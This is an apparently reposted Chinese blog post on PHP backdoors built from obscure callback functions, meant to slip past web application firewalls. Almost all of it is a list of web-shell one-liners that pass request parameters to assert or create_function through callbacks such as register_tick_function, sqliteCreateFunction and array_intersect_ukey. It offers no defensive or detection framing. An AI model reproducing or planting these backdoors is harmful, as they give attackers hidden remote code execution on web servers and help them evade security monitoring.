PHP后门之冷门回调函数(过waf)
Posted -qing-
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了PHP后门之冷门回调函数(过waf)相关的知识,希望对你有一定的参考价值。
header_register_callback(create_function(‘‘,‘return assert($_POST[\‘k\‘]);‘));
$e = $_REQUEST[‘e‘]; declare(ticks=1); register_tick_function ($e, $_REQUEST[‘pass‘]);`
数据库回调后门
$e = $_REQUEST[‘e‘]; $db = new PDO(‘sqlite:sqlite.db3‘); $db->sqliteCreateFunction(‘myfunc‘, $e, 1); $sth = $db->prepare("SELECT myfunc(:exec)"); $sth->execute(array(‘:exec‘ => $_REQUEST[‘pass‘])); $e = $_REQUEST[‘e‘];
register_shutdown_function($e, $_REQUEST[‘pass‘]);
mb_ereg_replace_callback(‘.+‘, create_function(‘$arr‘, ‘return assert($arr[0]);‘),$_REQUEST[‘pass‘]);
array_reduce(array($_POST[‘k‘]),create_function(‘$a,$b‘,‘return assert($b);‘));
set_exception_handler(create_function(‘‘,‘return assert($_GET[k]);‘)); throw new exception();
class a { public function __construct($args) { forward_static_call(‘assert‘,$args); } } new a($_POST[k]);
iterator_apply(new arrayiterator(array($_GET[‘k‘])),create_function(‘Iterator $i‘,‘assert($i->current());‘),array(new arrayiterator(array($_GET[‘k‘]))));
array_intersect_ukey(array($_GET[‘k‘]=>‘1‘),array($_GET[‘k‘]=>‘1‘),‘assert‘);
array_uintersect_uassoc(array($_GET[k]),array(‘‘),‘assert‘,‘strstr‘);
array_intersect_uassoc(array($_POST[‘k‘]=>‘‘),array(‘‘),‘assert‘);
filter_var("phpinfo();" ,1024, array("options" => "assert"));
以上是关于PHP后门之冷门回调函数(过waf)的主要内容,如果未能解决你的问题,请参考以下文章